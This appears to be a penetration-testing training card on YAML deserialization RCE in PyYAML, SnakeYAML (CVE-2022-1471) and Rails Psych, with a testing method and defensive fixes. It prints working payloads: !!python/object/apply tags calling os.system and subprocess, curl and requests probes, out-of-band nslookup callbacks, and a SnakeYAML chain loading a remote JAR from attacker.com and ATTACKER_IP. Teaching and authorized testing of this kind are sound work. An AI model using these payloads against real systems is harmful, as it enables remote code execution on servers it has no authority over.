YAML unsafe load

web_injection_logic Difficulty 1–5 30 min certifiable

Theory

Why This Matters

CVE-2022-1471 (SnakeYAML 1.x, CVSS 9.8) demonstrated that Java's most popular YAML parsing library executed arbitrary code when parsing user-supplied YAML containing constructor tags. The vulnerability affected Spring Boot applications via SnakeYAML as a transitive dependency — a pattern present in thousands of enterprise deployments. In the Python ecosystem, PyYAML's yaml.load() without a Loader argument has been documented as dangerous since 2006, yet as of 2022 GitHub code search still returned hundreds of thousands of production uses of the unsafe pattern. Ruby's Psych YAML parser (used in Rails) had a critical deserialization issue (CVE-2013-0156) that led to mass exploitation of Rails applications. The YAML deserialization class of vulnerabilities is language-agnostic, pervasive, and consistently underestimated.

Core Concept

YAML (YAML Ain't Markup Language) supports type tags — a mechanism that instructs the parser to construct a specific language type from a scalar value. In Python's PyYAML:

!!python/object/apply:os.system ["id"]

The !!python/object/apply: tag causes PyYAML to call os.system with the argument "id" during parsing. This is not a bug — it is the intended behavior of PyYAML's FullLoader and the pre-5.1 default loader. The security flaw is using this loader to parse untrusted input.

PyYAML loader hierarchy (from most to least powerful): 1. FullLoader (default since PyYAML 5.1) — supports !!python/ tags; vulnerable to arbitrary code execution. 2. UnsafeLoader (alias for pre-5.1 behavior) — fully unsafe. 3. SafeLoader — restricts to YAML-native types (strings, integers, lists, dicts); no Python type tags. This is the only safe option for untrusted input. 4. BaseLoader — all values as strings; safest but loses type coercion.

The violated invariant: YAML parsing must not execute code or instantiate arbitrary types when processing untrusted data. Parsing is a read-only operation; it must not have side effects.

Java SnakeYAML supports constructor tags analogous to PyYAML:

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://attacker.com/malicious.jar"]]]]

This causes SnakeYAML to instantiate URLClassLoader, load a remote JAR, and execute its static initializer — a complete RCE gadget via a single YAML document.

Ruby Psych (historical, fixed): Rails' from_yaml method allowed similar construction. The fix was restricting permitted classes.

Technical Deep-Dive

# ── PyYAML exploitation ────────────────────────────────────────────────────
import yaml

# PAYLOAD 1: execute os.system() — classic PyYAML RCE
malicious_yaml_1 = "!!python/object/apply:os.system ['id']"

# PAYLOAD 2: subprocess — more flexible, captures output
malicious_yaml_2 = """
!!python/object/apply:subprocess.check_output
  - [id]
"""

# PAYLOAD 3: write file — persistent payload
malicious_yaml_3 = """
!!python/object/apply:subprocess.check_output
  - [bash, -c, "echo pwned > /tmp/yaml_rce_proof.txt"]
"""

# Trigger with vulnerable yaml.load() call
# yaml.load() without Loader argument is FullLoader in PyYAML >= 5.1
# still vulnerable to !!python/ tags
result = yaml.load(malicious_yaml_1, Loader=yaml.FullLoader)
# On PyYAML < 5.1: yaml.load(malicious_yaml_1) also works

# ── SAFE alternative ───────────────────────────────────────────────────────
safe_data = yaml.safe_load("name: alice
role: admin
")
print(safe_data)   # {'name': 'alice', 'role': 'admin'}  — no code execution

# ── Detection: test an endpoint that accepts YAML input ───────────────────
import requests

# Craft an OOB DNS payload (safe for assessments)
oob_yaml = "!!python/object/apply:subprocess.check_output [[nslookup, YOUR.burpcollab.net]]"

resp = requests.post(
    "https://app.example.com/api/config",
    data=oob_yaml,
    headers={"Content-Type": "application/x-yaml"},
)
print(resp.status_code)
# Monitor Burp Collaborator for DNS callback → confirms unsafe YAML loading

// ── Java SnakeYAML exploitation (CVE-2022-1471) ───────────────────────────
// Payload: load a malicious JAR via URLClassLoader constructor tag
// This executes code in the JAR's static initializer on load

String yaml_payload =
    "!!javax.script.ScriptEngineManager " +
    "[!!java.net.URLClassLoader " +
    "[[!!java.net.URL ["http://ATTACKER_IP:8888/malicious.jar"]]]]
";

// On the attacker server: serve a JAR whose static initializer calls Runtime.exec()
// Detected in traffic as: Content-Type: application/yaml or text/yaml

// SECURE fix: use SafeConstructor
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;

Yaml yaml = new Yaml(new SafeConstructor());
Object safe = yaml.load(untrustedInput);   // Constructor tags are rejected

# Quick test: probe YAML endpoint with a benign !!python/ tag
curl -s -X POST https://app.example.com/api/config 
    -H "Content-Type: application/yaml" 
    -d "!!python/object/apply:os.getpid []"
# If response contains a PID integer, yaml.load(Loader=FullLoader) is in use

# OOB DNS via curl (no code execution, safe for detection)
curl -s -X POST https://app.example.com/api/parse 
    -H "Content-Type: text/yaml" 
    -d "!!python/object/apply:subprocess.check_output [[nslookup, YOUR.burpcollab.net]]"

Security Assessment Methodology

Identify YAML input surfaces — Search for endpoints accepting Content-Type: application/yaml, text/yaml, or application/x-yaml. Also look for file upload endpoints accepting .yaml or .yml files, and configuration import features.
Probe with a benign tag — Submit !!python/object/apply:os.getpid [] (Python) or !!java.lang.Integer [42] (Java). If the response reflects a parsed integer or process ID, unsafe loading is confirmed without executing shell commands.
Escalate with OOB DNS — Submit a payload calling nslookup YOUR.burpcollab.net via subprocess.check_output or SnakeYAML's URLClassLoader chain. Monitor for DNS callback. OOB confirmation avoids side effects.
Confirm OS command execution — Write a non-destructive proof file: echo "YAML_RCE" > /tmp/yaml_proof_$(date +%s).txt. Verify creation via a subsequent path-disclosure or file-read endpoint.
Check Java applications for SnakeYAML version — Inspect pom.xml or build.gradle for snakeyaml < 2.0. CVE-2022-1471 is unpatched until SnakeYAML 2.0, which defaults to SafeConstructor.
Test Ruby/Rails YAML endpoints — Rails' ActiveRecord::Base.yaml_column_permitted_classes config determines permitted classes. Older Rails versions have no such restriction.

Defensive Countermeasure — In Python, always use yaml.safe_load() or explicitly pass Loader=yaml.SafeLoader to yaml.load(). Never use yaml.load() with the default FullLoader or UnsafeLoader for untrusted input. In Java, instantiate SnakeYAML as new Yaml(new SafeConstructor()) and upgrade to SnakeYAML >= 2.0. In CI, add a static analysis rule banning yaml.load( without SafeLoader. For Ruby on Rails, configure yaml_column_permitted_classes to an explicit allowlist.

Common Assessment Errors

Assuming PyYAML >= 5.1 is safe by default — PyYAML 5.1 changed the default to FullLoader, which still supports !!python/ tags and is still vulnerable. Only SafeLoader is safe for untrusted input.
Only testing the explicit yaml.load() call — Libraries that wrap YAML parsing (e.g., configuration loaders, ORM serializers, REST framework body parsers) may internally call yaml.load(). Test all YAML-accepting endpoints, not just ones where you see yaml.load() in the source.
Missing YAML input in non-obvious content types — Some applications accept YAML with Content-Type: text/plain or application/octet-stream. Try YAML payloads across all content types.
Forgetting Ruby and Java — The SnakeYAML and Psych vulnerabilities are widely deployed. YAML deserialization is not Python-specific.
Not testing file-based YAML input — Configuration file import features that parse YAML from uploaded files are a common overlooked vector.
Treating a 400/500 error as safe — A parser error on !!python/ may mean the server is running Python 3 without the tag, not that it's using SafeLoader. Test with !!python/object/apply:os.getpid [] to differentiate.

NICE Framework Alignment

Code	Knowledge/Skill/Task Statement	How This Card Develops It
K0009	Knowledge of application vulnerabilities	Explains YAML type tag mechanics and loader hierarchy across Python and Java
K0070	Knowledge of system and application security threats and vulnerabilities	Maps yaml.load() RCE to CVE-2022-1471 and the Rails YAML deserialization history
S0001	Skill in conducting vulnerability scans and recognizing vulnerabilities in security systems	Trains safe probing with benign tags before escalating to OOB confirmation
S0044	Skill in mimicking threat behaviors to test defenses	Develops payload crafting for PyYAML and SnakeYAML exploitation
T0028	Conduct and support authorized penetration testing on enterprise networks	Provides a staged methodology from probe through OOB through RCE confirmation
T0591	Perform penetration testing as required for new or updated applications	Frames YAML input testing as a required step for Python and Java applications